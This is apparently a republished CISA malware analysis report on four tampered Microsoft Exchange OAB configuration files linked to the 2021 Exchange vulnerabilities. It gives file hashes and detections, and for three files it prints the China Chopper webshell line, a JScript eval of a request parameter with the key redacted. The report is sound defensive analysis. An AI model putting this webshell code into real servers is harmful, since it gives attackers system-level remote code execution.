This article is contributed. See the original author and article here.

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

Four files were submitted to CISA for analysis. All of the files are modified Offline Address Book (OAB) Virtual Directories (VD) configuration files for Microsoft Exchange Servers. Three of the files have been modified with a variant of the “China Chopper” webshell. The last file is modified with an authentication key. The modifications allow an attacker to remotely access the server and execute arbitrary code on the system(s).

For a downloadable copy of IOCs, see: MAR-10329494-1.v1.stix.

Submitted Files (4)

0c5fd2b5d1bfe5ffca2784541c9ce2ad3d22a9cb64d941a8439ec1b2a411f7f8 (McYhCzdb.aspx)

138f0a63c9a69b35195c49189837e899433b451f98ff72c515133d396d515659 (0q1iS7mn.aspx)

36149efb63a0100f4fb042ad179945aab1939bcbf8b337ab08b62083c38642ac (8aUco9ZK.aspx)

508ac97ea751daebe8a99fa915144036369fc9e831697731bf57c07f32db01e8 (ogu7zFil.aspx)

Findings

138f0a63c9a69b35195c49189837e899433b451f98ff72c515133d396d515659

Tags

backdoorwebshell

Details
Name 0q1iS7mn.aspx
Size 2267 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 96615abf60b920de78e7c269fb93d31d
SHA1 d33cd3731ab7201aff67d8b9c13d962efbb2f361
SHA256 138f0a63c9a69b35195c49189837e899433b451f98ff72c515133d396d515659
SHA512 1bc07f9daa318ba60f48b3259b2008e7f7cc9ffa85ae121efb9d6a373769889c0676e10fa4681220eae260467a5945bfb4b0e13a7ff41110e2de0a8b6957aaf3
ssdeep 48:kNrdejol1By90KM5QZXhHwlu/44ONF0qIe9:ktdejqpAwljNCqIo
Entropy 4.730814
Antivirus
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065.B!dha
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file from a legitimate Set-OABVirtualDirectory cmdlet. This file is typically used to edit an OAB VD in Internet Information Services (IIS) on Microsoft Exchange servers. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. The OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will be directly executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

The ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the virtual directory from outside the firewall has been replaced with the following code:

–Begin Code–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED”],”unsafe”);}</script>
–End Code–

Note: The hard-coded key used for authentication was redacted from the code above.

This code allows an attacker to access the shell using a password. Once accessed, the attacker is able to execute commands on the page with server (system) level privileges.

0c5fd2b5d1bfe5ffca2784541c9ce2ad3d22a9cb64d941a8439ec1b2a411f7f8

Tags

backdoorwebshell

Details
Name McYhCzdb.aspx
Size 2264 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 f751c8fd2a9a4dbf3b5f9ec7fd787cab
SHA1 ce72ac7d88bf6c1ab33be213c1698a8c84be0d61
SHA256 0c5fd2b5d1bfe5ffca2784541c9ce2ad3d22a9cb64d941a8439ec1b2a411f7f8
SHA512 e2a9bd4de213894c8306fb84c254d7d1c332c756c93c77123a9d5586547bf27896ec0152ba98594b3bac71f23090f3addf26b14ddedddfa1755f9adcf73f6d9d
ssdeep 48:kNrdejol1By90KM5QZXhHwlx/44ONF0qT/i9:ktdejqpAwlaNCqT8
Entropy 4.735542
Antivirus
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065.B!dha
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file from a legitimate Set-OABVirtualDirectory cmdlet. This file is typically used to edit an OAB VD in IIS on Microsoft Exchange Servers. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. The OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will be directly executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

The ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin Code–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End Code–

Note: The hard-coded key used for authentication was redacted from the code above.

This code allows an attacker to access the shell using a password. Once accessed, the attacker is able to execute commands on the page with server (system) level privileges.

36149efb63a0100f4fb042ad179945aab1939bcbf8b337ab08b62083c38642ac

Tags

backdoorwebshell

Details
Name 8aUco9ZK.aspx
Size 2267 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 b4f08c50f1a33facc31ca7e558861223
SHA1 afd0b74ffa8243be4bb198ed04f8ae699ee2611b
SHA256 36149efb63a0100f4fb042ad179945aab1939bcbf8b337ab08b62083c38642ac
SHA512 a7ab2e0ed33e8760d8b2ccb4ac06b865977cc4fe49ab55db0691c4a2712bcae371febd0bab172cf56f4e4b6734cea7f101a238cfdbebba218e70b8da9fabef39
ssdeep 48:kNrdejol1By90KM5QZXhHwlTM/44ONF0qwFEvz9:ktdejqpAwlTRNCqwFUh
Entropy 4.732708
Antivirus
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065.B!dha
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file from a legitimate Set-OABVirtualDirectory cmdlet. This file is typically used to edit an OAB VD in IIS on Microsoft Exchange Servers. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. The OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will be directly executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

The ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin Code–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End Code–

Note: The hard-coded key used for authentication was redacted from the code above.

This code allows an attacker to access the shell using a password. Once accessed, the attacker is able to execute commands on the page with server (system) level privileges.

508ac97ea751daebe8a99fa915144036369fc9e831697731bf57c07f32db01e8

Tags

backdoor

Details
Name ogu7zFil.aspx
Size 2284 bytes
Type ASCII text, with CRLF line terminators
MD5 cc26cdd5d9dc85fcfa2646d7105fd158
SHA1 11ba31e8052a9f685a15a9c95d4009582edff3ae
SHA256 508ac97ea751daebe8a99fa915144036369fc9e831697731bf57c07f32db01e8
SHA512 52cec6b6b95348c158bea4df6fde405283d7766099a4f7839a19021dea057553d41a6e07195f3789893650a821893f297a4ed2718e222b243eeb4555351a962e
ssdeep 48:k/U0rddol1Bq67PQZXhHwldz/44ONF0quKiYiK9:kFddqdQwldMNCquKL5
Entropy 4.572126
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file from a legitimate Set-OABVirtualDirectory cmdlet. This file is typically used to edit a OAB VD in IIS on Microsoft Exchange servers. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. The configuration has been modified with a key in the ‘ExternalUrl’ field. The key is most likely used for authentication to the server.

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.